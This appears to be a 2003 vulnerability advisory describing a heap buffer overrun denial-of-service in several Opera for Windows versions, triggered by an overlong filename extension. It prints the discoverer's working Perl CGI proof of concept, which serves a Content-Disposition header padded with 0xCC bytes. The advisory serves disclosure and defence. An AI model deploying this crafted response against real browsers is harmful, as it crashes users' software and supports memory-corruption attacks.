Reported April 28, 2003, by
nesumin.
VERSIONS
AFFECTED
Opera for Windows 7.10
(build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b),
7.01 (build 2651), 6.06b (build 1145), 6.06 (build 1144), 6.05 (build 1140)
DESCRIPTION
DEMONSTRATION
The
discoverer posted the following code as proof of concept:
================
This is a Perl
script.
---------------------------------------------------------------
#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI
program.
$|=1;
my $filename = "." .
"\xCC" x (int(rand(0x20000)) + 0x100);
print "Content-type:
text/html\r\n";
print qq~Content-Disposition:
filename="$filename"\r\n~;
print "\r\n";
print
"<html><body>Love & Peace :)</body></html>\r\n";
---------------------------------------------------------------
VENDOR
RESPONSE
CREDIT
Discovered by
nesumin.
Several versions of Opera for Windows contain a Denial of Service (DoS) condition. The condition results from an unchecked buffer on the heap and Opera's failure to check the length of a filename.
Opera has yet to respond to this problem.
Long File Extension Heap Buffer Overrun Vulnerability in Opera for Windows
0 comments
Hide comments